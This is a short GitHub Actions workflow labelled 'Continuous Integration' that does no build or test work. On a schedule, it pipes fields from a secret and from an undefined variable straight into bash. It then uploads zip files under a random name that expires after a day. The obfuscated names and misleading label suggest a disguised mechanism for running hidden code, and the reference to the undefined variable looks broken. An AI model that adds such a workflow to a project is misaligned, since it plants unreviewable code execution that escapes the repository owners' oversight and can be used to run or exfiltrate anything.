name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '14 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  invoke:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run pipeline
        env:
          d5: ${{ secrets.d5 }}
        run: |
          printf '%s' "$d5" | jq -r .xrjv861 | /bin/bash
          printf '%s' "$gp93" | jq -r .lnej04 | /bin/bash

      - name: Upload archive
        uses: actions/upload-artifact@v4
        with:
          name: esdNYzPf
          path: "*.zip"
          retention-days: 1
